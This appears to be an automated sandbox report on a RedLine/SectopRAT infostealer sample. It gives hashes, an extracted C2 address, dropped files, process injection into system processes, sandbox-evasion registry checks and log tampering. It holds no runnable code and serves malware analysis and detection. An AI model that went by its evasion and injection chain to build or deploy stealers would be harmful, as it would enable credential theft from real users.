redline | 30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
06-08-2024 13:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe
Size

1.4MB
MD5

d70eb78f0c8b90a0ece87c353a2ebb5e
SHA1

cb328eaf56214d5335dac833e4c89c29de2d372f
SHA256

30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5
SHA512

6f5be3370487fdeb189f56fc610c88a749dbe00ebe5a19dcdae21eb5648e0da86316b174fed7914eb5841baf03d19419238a6c4fa0203775beea94d4904eb1de
SSDEEP

24576:gxcJspxHAYT3XVJlT7cpqOynkxZkW8tIkyrJv24/Yh3NW0zFdlR8rqW2xhSJ8R:g+azT3PlT7WdsTJOqtUiR

Score

10^/10

redline sectoprat server.underground-cheat.xyz defense_evasion discovery execution infostealer rat trojan

Malware Config

Extracted

Family

redline

Botnet

server.underground-cheat.xyz

server.underground-cheat.xyz:1337

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\$77redlin.exe	family_redline
behavioral1/memory/4308-394-0x0000000000250000-0x000000000026E000-memory.dmp	family_redline

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4460-0-0x0000000000400000-0x000000000055E000-memory.dmp	family_sectoprat
C:\Users\Admin\AppData\Local\Temp\$77redlin.exe	family_sectoprat
behavioral1/memory/4308-394-0x0000000000250000-0x000000000026E000-memory.dmp	family_sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 452 created 616 452 powershell.EXE winlogon.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXE

pid process

5436 powershell.exe
452 powershell.EXE

description	pid	process	target process
PID 452 created 616	452	powershell.EXE	winlogon.exe

pid	process
5436	powershell.exe
452	powershell.EXE

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe

Executes dropped EXE 4 IoCs

Processes:

Install1.exe$77taskhostw.exe$77redlin.exeTypeId.exe

pid process

4548 Install1.exe
4780 $77taskhostw.exe
4308 $77redlin.exe
1372 TypeId.exe

pid	process
4548	Install1.exe
4780	$77taskhostw.exe
4308	$77redlin.exe
1372	TypeId.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

Processes:

svchost.exe

description	ioc	process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Drops file in System32 directory 9 IoCs

Processes:

powershell.EXEsvchost.exesvchost.exeOfficeClickToRun.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\iizhwxm	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\WaitHandle\TypeId	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXETypeId.exe

description	pid	process	target process
PID 452 set thread context of 5168	452	powershell.EXE	dllhost.exe
PID 1372 set thread context of 5440	1372	TypeId.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exeInstall1.exe$77redlin.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Install1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77redlin.exe

Checks SCSI registry key(s) 3 TTPs 18 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID	wmiprvse.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

wmiprvse.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEsvchost.exeOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 06 Aug 2024 13:25:54 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={CF844034-4BDC-43D8-B9DB-CA578B702315}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe

Modifies registry class 2 IoCs

Processes:

30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exeExplorer.EXE

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEdllhost.exewmiprvse.exe

pid	process
452	powershell.EXE
452	powershell.EXE
452	powershell.EXE
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
1956	wmiprvse.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe
5168	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.EXE$77redlin.exedllhost.exesvchost.exe$77taskhostw.exesvchost.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	452	powershell.EXE
Token: SeDebugPrivilege	4308	$77redlin.exe
Token: SeDebugPrivilege	452	powershell.EXE
Token: SeDebugPrivilege	5168	dllhost.exe
Token: SeAssignPrimaryTokenPrivilege	2200	svchost.exe
Token: SeIncreaseQuotaPrivilege	2200	svchost.exe
Token: SeSecurityPrivilege	2200	svchost.exe
Token: SeTakeOwnershipPrivilege	2200	svchost.exe
Token: SeLoadDriverPrivilege	2200	svchost.exe
Token: SeSystemtimePrivilege	2200	svchost.exe
Token: SeBackupPrivilege	2200	svchost.exe
Token: SeRestorePrivilege	2200	svchost.exe
Token: SeShutdownPrivilege	2200	svchost.exe
Token: SeSystemEnvironmentPrivilege	2200	svchost.exe
Token: SeUndockPrivilege	2200	svchost.exe
Token: SeManageVolumePrivilege	2200	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2200	svchost.exe
Token: SeIncreaseQuotaPrivilege	2200	svchost.exe
Token: SeSecurityPrivilege	2200	svchost.exe
Token: SeTakeOwnershipPrivilege	2200	svchost.exe
Token: SeLoadDriverPrivilege	2200	svchost.exe
Token: SeSystemtimePrivilege	2200	svchost.exe
Token: SeBackupPrivilege	2200	svchost.exe
Token: SeRestorePrivilege	2200	svchost.exe
Token: SeShutdownPrivilege	2200	svchost.exe
Token: SeSystemEnvironmentPrivilege	2200	svchost.exe
Token: SeUndockPrivilege	2200	svchost.exe
Token: SeManageVolumePrivilege	2200	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2200	svchost.exe
Token: SeIncreaseQuotaPrivilege	2200	svchost.exe
Token: SeSecurityPrivilege	2200	svchost.exe
Token: SeTakeOwnershipPrivilege	2200	svchost.exe
Token: SeLoadDriverPrivilege	2200	svchost.exe
Token: SeSystemtimePrivilege	2200	svchost.exe
Token: SeBackupPrivilege	2200	svchost.exe
Token: SeRestorePrivilege	2200	svchost.exe
Token: SeShutdownPrivilege	2200	svchost.exe
Token: SeSystemEnvironmentPrivilege	2200	svchost.exe
Token: SeUndockPrivilege	2200	svchost.exe
Token: SeManageVolumePrivilege	2200	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2200	svchost.exe
Token: SeIncreaseQuotaPrivilege	2200	svchost.exe
Token: SeSecurityPrivilege	2200	svchost.exe
Token: SeTakeOwnershipPrivilege	2200	svchost.exe
Token: SeLoadDriverPrivilege	2200	svchost.exe
Token: SeSystemtimePrivilege	2200	svchost.exe
Token: SeBackupPrivilege	2200	svchost.exe
Token: SeRestorePrivilege	2200	svchost.exe
Token: SeShutdownPrivilege	2200	svchost.exe
Token: SeSystemEnvironmentPrivilege	2200	svchost.exe
Token: SeUndockPrivilege	2200	svchost.exe
Token: SeManageVolumePrivilege	2200	svchost.exe
Token: SeDebugPrivilege	4780	$77taskhostw.exe
Token: SeBackupPrivilege	1144	svchost.exe
Token: SeRestorePrivilege	1144	svchost.exe
Token: SeDebugPrivilege	5436	powershell.exe
Token: SeBackupPrivilege	1144	svchost.exe
Token: SeRestorePrivilege	1144	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2200	svchost.exe
Token: SeIncreaseQuotaPrivilege	2200	svchost.exe
Token: SeSecurityPrivilege	2200	svchost.exe
Token: SeTakeOwnershipPrivilege	2200	svchost.exe
Token: SeLoadDriverPrivilege	2200	svchost.exe
Token: SeSystemtimePrivilege	2200	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid process

3536 Explorer.EXE
3536 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3536 Explorer.EXE

pid	process
3536	Explorer.EXE
3536	Explorer.EXE

pid	process
3536	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4460 wrote to memory of 4548	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	Install1.exe
PID 4460 wrote to memory of 4548	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	Install1.exe
PID 4460 wrote to memory of 4548	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	Install1.exe
PID 4460 wrote to memory of 4780	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	$77taskhostw.exe
PID 4460 wrote to memory of 4780	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	$77taskhostw.exe
PID 4460 wrote to memory of 4308	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	$77redlin.exe
PID 4460 wrote to memory of 4308	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	$77redlin.exe
PID 4460 wrote to memory of 4308	4460	30d31c8a72f67e34bbedc3d6fade478b913943dc7467c56dc81938272eef79a5.exe	$77redlin.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 452 wrote to memory of 5168	452	powershell.EXE	dllhost.exe
PID 5168 wrote to memory of 616	5168	dllhost.exe	winlogon.exe
PID 5168 wrote to memory of 672	5168	dllhost.exe	lsass.exe
PID 5168 wrote to memory of 964	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 60	5168	dllhost.exe	dwm.exe
PID 5168 wrote to memory of 736	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1028	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1136	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1144	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1152	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1160	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1232	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1344	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1356	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1376	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1436	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1584	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1592	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1644	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1704	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1748	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1776	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1836	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1888	5168	dllhost.exe	svchost.exe
PID 5168 wrote to memory of 1900	5168	dllhost.exe	svchost.exe
